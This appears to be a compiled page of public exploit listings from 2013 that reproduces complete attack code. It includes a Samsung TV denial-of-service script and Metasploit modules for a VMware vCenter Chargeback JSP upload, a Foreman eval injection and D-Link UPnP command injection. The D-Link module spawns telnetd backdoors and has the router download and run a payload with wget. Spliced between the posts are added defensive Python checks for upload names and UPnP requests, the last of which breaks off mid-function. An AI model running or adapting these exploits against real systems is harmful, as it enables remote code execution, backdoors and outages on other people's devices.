The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab
disclaims all warranties, either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of business profits or special damages,
even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com                     - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev - forum.vulnerability-db.com         - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from
Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research
Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this
website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com)
to get a permission.

                                Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
```
  22. Description : The DMCRUIS/0.1 web server on Samsung TVs suffers from a denial of service vulnerability.
      Author : Malik Messelem
      Source : Samsung TV Denial Of Service ≈ Packet Storm
      Code :

```python
#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware

import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV \n"
print " ***************************************************************************************\n"

# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1], 5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
    response = os.system("ping -c 1 " + sys.argv[1] + " > /dev/null 2>&1")
if response != 0:
    print " Target down!\n"
```
  23. Description : This Metasploit module exploits a code execution flaw in VMware vCenter Chargeback Manager, where the ImageUploadServlet servlet allows unauthenticated file upload. The files are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed. The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1 on Windows 2003 SP2.
      Author : Andrea Micalizzi, juan vazquez
      Source : VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload ≈ Packet Storm
      Code :

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a code execution flaw in VMware vCenter Chargeback Manager,
        where the ImageUploadServlet servlet allows unauthenticated file upload. The files
        are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.
        The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1
        on Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Andrea Micalizzi', # Vulnerability discovery
          'juan vazquez'      # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3520' ],
          [ 'OSVDB', '94188' ],
          [ 'BID', '60484' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-147/' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2', { } ]
        ],
      'DefaultOptions' => { 'SSL' => true },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 15 2013'))

    register_options(
      [
        Opt::RPORT(443)
      ], self.class)
  end

  #
  # Try to find and delete the jsp if we get a meterpreter.
  #
  def on_new_session(cli)
    if not @dropper or @dropper.empty?
      return
    end

    if cli.type != 'meterpreter'
      print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}")
      return
    end

    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

    begin
      print_status("#{@peer} - Searching: #{@dropper}")
      files = cli.fs.file.search("\\", @dropper)
      if not files or files.empty?
        print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.")
        return
      end

      files.each { |f|
        print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
        cli.fs.file.rm(f['path'] + "\\" + f['name'])
      }
      print_good("#{@peer} - #{@dropper} deleted")
      return
    rescue ::Exception => e
      print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}")
    end
  end

  def upload_file(filename, contents)
    post_data = Rex::MIME::Message.new
    # The extraction had replaced the interpolated parameter here; it is the
    # method's own filename argument.
    post_data.add_part(contents, "image/png", nil, "form-data; name=\"#{rand_text_alpha(4+rand(4))}\"; filename=\"#{filename}\"")

    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi(
      {
        'uri'    => normalize_uri("cbmui", "ImageUploadServlet"),
        'method' => 'POST',
        'data'   => data,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
        'cookie' => "JSESSIONID=#{@session}"
      })

    if res and res.code == 200
      return true
    else
      return false
    end
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri("cbmui", "en_US", "themes", "excel", "index.htm"),
    })

    if res and res.code == 200 and res.body =~ /vCenter Chargeback Manager/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    @peer = "#{rhost}:#{rport}"

    print_status("#{@peer} - Uploading JSP to execute the payload")
    exe = payload.encoded_exe
    exe_filename = rand_text_alpha(8) + ".exe"
    # The JSP dropper is needed because there isn't directory traversal, just
    # arbitrary file upload to a web path where JSP code execution is allowed.
    dropper = jsp_drop_and_execute(exe, exe_filename)
    dropper_filename = rand_text_alpha(8) + ".jsp"

    if upload_file(dropper_filename, dropper)
      register_files_for_cleanup(exe_filename)
      @dropper = dropper_filename
    else
      fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed")
    end

    print_status("#{@peer} - Executing payload")
    send_request_cgi(
      {
        'uri'    => normalize_uri("cbmui", "images", dropper_filename),
        'method' => 'GET'
      })
  end

  # This should probably go in a mixin
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end
end
```
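Both upload issues above come down to the same two missing checks: the Photo Server advisory (post 21) names a device name that is never encoded before it lands in the listing, a multipart filename that is never stripped of path segments, and stacked extensions such as image.jpg.js.php.jpg that slip past the allowlist, while the vCenter Chargeback Manager servlet (post 23) accepts a .jsp where an image is expected and serves it from an executable web path. The following Python is an added example written here, not code from either post, from the advisory's authors or from the affected products; the `ALLOWED_EXTENSIONS` set, the `RejectedUpload` class and the sample names are constructed for illustration.

```python
"""Upload-name and listing hardening, following the advisory's Solution items 1.1-1.3."""
import html
import re

# Photo Server accepts QuickTime (.MOV) or JPEG (.JPG/.jpeg) uploads, so that is the
# allowlist used here. Constructed for this example; the real app's list is not published.
ALLOWED_EXTENSIONS = {"mov", "jpg", "jpeg"}

# A base name of safe characters followed by exactly one extension. A second dot
# anywhere in the name fails to match, which is what rejects image.jpg.js.php.jpg
# (item 1.3) and shell.jsp.png-style names alike.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


class RejectedUpload(ValueError):
    """Raised when an uploaded file name fails validation (constructed for this example)."""


def validate_upload_name(raw_name: str) -> str:
    """Return the name under which the file may be stored, or raise RejectedUpload.

    Item 1.2: refuse any path separator or relative entry outright rather than
    trying to clean it. Item 1.3: require a single extension from the allowlist.
    """
    if "/" in raw_name or "\\" in raw_name or raw_name in ("", ".", ".."):
        raise RejectedUpload("path component in file name: %r" % raw_name)

    match = _SAFE_NAME.match(raw_name)
    if match is None:
        raise RejectedUpload("file name must be <base>.<ext> with one extension: %r" % raw_name)

    ext = match.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise RejectedUpload("extension %r not allowed" % ext)

    # Normalise the extension so the on-disk name and the listing agree.
    return "%s.%s" % (raw_name[: -len(match.group(1)) - 1], ext)


def render_listing(device_name: str, file_names: list) -> str:
    """Build the index page the app serves, with every untrusted value escaped.

    The device name is attacker-controlled on a shared device (item 1.1) and the
    stored file names are attacker-controlled remotely (item 1.2), so both are
    HTML-escaped, quotes included, before they are placed in markup or attributes.
    """
    safe_device = html.escape(device_name, quote=True)
    lines = [
        "<title>%s's Photo Server App Web Browser Interface Page</title>" % safe_device,
        "<h1>The Video and Photo List</h1>",
    ]
    for name in file_names:
        safe_name = html.escape(name, quote=True)
        lines.append('<li><a href="assets/%s">%s</a></li>' % (safe_name, safe_name))
    return "\n".join(lines)


def check_upload(raw_name: str) -> dict:
    """Return a decision record instead of raising, for logging or for a test."""
    try:
        return {"accepted": True, "stored_as": validate_upload_name(raw_name)}
    except RejectedUpload as exc:
        return {"accepted": False, "reason": str(exc)}


if __name__ == "__main__":
    # Constructed sample names: the advisory's stacked-extension name, a traversal
    # attempt, a JSP passed off as an image, and two legitimate files.
    for candidate in ("image.jpg.js.php.jpg", "../evil.PNG", "shell.jsp",
                      "IMG_0001.JPG", "clip.mov"):
        print(candidate, "->", check_upload(candidate))
    print(render_listing('iPad ><iframe src=a>', ["IMG_0001.jpg"]))
```

The second half of the advisory's item 1.3 fix, disabling script execution in the upload directory, is a web-server setting and is not shown here.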
  24. Description : This Metasploit module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).
      Author : Ramon de C Valle
      Source : Foreman (Red Hat OpenStack/Satellite) Code Injection ≈ Packet Storm
      Code :

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
      'Description' => %q{
        This module exploits a code injection vulnerability in the 'create'
        action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
        (Foreman 1.2.0-RC1 and earlier).
      },
      'Author' => 'Ramon de C Valle',
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2013-2121'],
          ['CWE', '95'],
          ['OSVDB', '94671'],
          ['BID', '60833'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
          ['URL', 'http://projects.theforeman.org/issues/2631']
        ],
      'Platform' => 'ruby',
      'Arch' => ARCH_RUBY,
      'Privileged' => false,
      'Targets' => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jun 6 2013',
      'DefaultOptions' => { 'PrependFork' => true },
      'DefaultTarget' => 0
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME', [true, 'Your username', 'admin']),
        OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
        OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
      ], self.class
    )
  end

  def exploit
    print_status("Logging into #{target_url}...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'users', 'login'),
      'vars_post' => {
        'login[login]' => datastore['USERNAME'],
        'login[password]' => datastore['PASSWORD']
      }
    )

    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
    else
      session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
    end

    print_status('Retrieving the CSRF token for this session...')
    res = send_request_cgi(
      'cookie' => "_session_id=#{session}",
      'method' => 'GET',
      'uri' => normalize_uri(target_uri)
    )

    fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?

    if res.headers['Location'] =~ /users\/login$/
      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
    else
      csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
      csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i

      if csrf_param.nil? || csrf_token.nil?
        csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
        csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
      end

      fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
    end

    payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)

    print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
    res = send_request_cgi(
      'cookie' => "_session_id=#{session}",
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'bookmarks'),
      'vars_post' => {
        csrf_param => csrf_token,
        payload_param => payload.encoded,
        'bookmark[controller]' => "eval(params[:#{payload_param}])#",
        'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
        'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
      }
    )
  end

  def target_url(*args)
    (ssl ? 'https' : 'http') +
      if rport.to_i == 80 || rport.to_i == 443
        "://#{vhost}"
      else
        "://#{vhost}:#{rport}"
      end + normalize_uri(target_uri.path, *args)
  end
end
```
  25. Description : Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the CMD target. Additionally, two targets are included, to start a telnetd service and establish a session over it, or deploy a native mipsel payload. This Metasploit module has been tested successfully on DIR-300, DIR-600, DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link devices may be affected.
      Author : Michael Messner, juan vazquez
      Source : D-Link Devices UPnP SOAP Command Execution ≈ Packet Storm
      Code :

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary::CommandShell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Devices UPnP SOAP Command Execution',
      'Description'    => %q{
        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
        interface. Since it is a blind OS command injection vulnerability, there is no
        output for the executed command when using the CMD target. Additionally, two targets
        are included, to start a telnetd service and establish a session over it, or deploy
        a native mipsel payload. This module has been tested successfully on DIR-300, DIR-600,
        DIR-645, DIR-845 and DIR-865. According to the vulnerability discoverer, more D-Link
        devices may be affected.
      },
      'Author'         =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez'                           # minor help with msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '94924' ],
          [ 'BID', '61005' ],
          [ 'EDB', '26664' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
        ],
      'DisclosureDate' => 'Jul 05 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'CMD', #all devices
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Telnet', #all devices - default target
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload', #DIR-865, DIR-645 and others with wget installed
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1
      ))

    register_options(
      [
        Opt::RPORT(49152), #port of UPnP SOAP webinterface
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
      ], self.class)
  end

  def exploit
    @new_portmapping_descr = rand_text_alpha(8)
    @new_external_port = rand(65535)
    @new_internal_port = rand(65535)

    if target.name =~ /CMD/
      exploit_cmd
    elsif target.name =~ /Telnet/
      exploit_telnet
    else
      exploit_mips
    end
  end

  def exploit_cmd
    if not (datastore['CMD'])
      fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
    end
    cmd = payload.encoded
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    return
  end

  def exploit_telnet
    telnetport = rand(65535)

    vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")

    cmd = "telnetd -p #{telnetport}"
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end

    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })

      if sock
        print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
        add_socket(sock)
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
      end

      print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
      auth_info = {
        :host        => rhost,
        :port        => telnetport,
        :sname       => 'telnet',
        :user        => "",
        :pass        => "",
        :source_type => "exploit",
        :active      => true
      }
      report_auth_info(auth_info)
      merge_me = {
        'USERPASS_FILE' => nil,
        'USER_FILE'     => nil,
        'PASS_FILE'     => nil,
        'USERNAME'      => nil,
        'PASSWORD'      => nil
      }
      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
    rescue
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end
    return
  end

  def exploit_mips
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))

    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false

    #
    # start our server
    #
    resource_uri = '/' + downfile

    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end

      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})

      datastore['SSL'] = true if ssl_restore
    end

    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)

    # The extraction had replaced the interpolated variable in this command and
    # in the cleanup call below; it is the local filename defined just above.
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
    type = "add"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")

    type = "delete"
    res = request(cmd, type)
    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
  end

  def request(cmd, type)
    uri = '/soap.cgi'

    data_cmd = "<?xml version=\"1.0\"?>"
    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data_cmd << "<SOAP-ENV:Body>"

    if type == "add"
      vprint_status("#{rhost}:#{rport} - adding portmapping")
      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
      data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
      data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
      data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
      data_cmd << "<NewEnabled>1</NewEnabled>"
      data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
      data_cmd << "<NewRemoteHost></NewRemoteHost>"
      data_cmd << "<NewProtocol>TCP</NewProtocol>"
      data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
      data_cmd << "</m:AddPortMapping>"
    else
      #we should clean it up ... otherwise we are not able to exploit it multiple times
      vprint_status("#{rhost}:#{rport} - deleting portmapping")
      soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
      data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
      data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
      data_cmd << "</m:DeletePortMapping>"
    end

    data_cmd << "</SOAP-ENV:Body>"
    data_cmd << "</SOAP-ENV:Envelope>"

    begin
      res = send_request_cgi({
        'uri'      => uri,
        'vars_get' => {
          'service' => 'WANIPConn1'
        },
        'ctype'    => "text/xml",
        'method'   => 'POST',
        'headers'  => {
          'SOAPAction' => soapaction,
        },
        'data'     => data_cmd
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the target to request the ELF payload...")

    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?")
      end
    end
  end
end
```
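A defender-side check for the AddPortMapping request the module above builds: the UPnP WANIPConnection service defines NewInternalClient as an IP address, so anything else in that field is malformed, and the backtick the module wraps around its command is exactly what the check flags. This is an added Python example, not code from the module or from D-Link's firmware; the two SOAP bodies are constructed, the malicious one carrying a harmless `echo` where the module would place its payload.

```python
"""Validate UPnP WANIPConnection AddPortMapping requests before any field reaches a shell."""
import ipaddress
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# The module sends the envelope namespace without the trailing slash; accept both
# spellings so a request is not missed on a string mismatch.
SOAP_NS_ALT = "http://schemas.xmlsoap.org/soap/envelope"
UPNP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"

# Characters with meaning to a POSIX shell; none of them belongs in an IP address.
_SHELL_META = re.compile(r"[`$;|&<>(){}\n\r]")


def _find_action(root):
    """Return the AddPortMapping element inside the SOAP Body, or None."""
    for ns in (SOAP_NS, SOAP_NS_ALT):
        body = root.find("{%s}Body" % ns)
        if body is not None:
            return body.find("{%s}AddPortMapping" % UPNP_NS)
    return None


def check_add_port_mapping(xml_text):
    """Inspect one SOAP request body.

    Returns a dict with 'verdict' in {'ok', 'malformed', 'suspicious', 'ignore'}
    and a 'reason'. 'ignore' means the request is not an AddPortMapping call.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return {"verdict": "malformed", "reason": "not well-formed XML: %s" % exc}

    action = _find_action(root)
    if action is None:
        return {"verdict": "ignore", "reason": "no AddPortMapping action"}

    # The argument elements carry no namespace prefix in the UPnP wire format.
    client = action.findtext("NewInternalClient", default="")
    ext_port = action.findtext("NewExternalPort", default="")
    int_port = action.findtext("NewInternalPort", default="")
    proto = action.findtext("NewProtocol", default="")

    # A shell metacharacter in an address field is the injection signature itself,
    # so it is reported separately from an ordinary bad address.
    if _SHELL_META.search(client):
        return {"verdict": "suspicious",
                "reason": "shell metacharacters in NewInternalClient: %r" % client}

    try:
        ipaddress.ip_address(client)
    except ValueError:
        return {"verdict": "malformed",
                "reason": "NewInternalClient is not an IP address: %r" % client}

    for label, value in (("NewExternalPort", ext_port), ("NewInternalPort", int_port)):
        if not value.isdigit() or not 1 <= int(value) <= 65535:
            return {"verdict": "malformed", "reason": "%s out of range: %r" % (label, value)}

    if proto not in ("TCP", "UDP"):
        return {"verdict": "malformed", "reason": "NewProtocol must be TCP or UDP: %r" % proto}

    return {"verdict": "ok",
            "reason": "AddPortMapping %s %s -> %s:%s" % (proto, ext_port, client, int_port)}


def _envelope(internal_client):
    """Build a constructed AddPortMapping body in the shape the module sends."""
    return (
        '<?xml version="1.0"?>'
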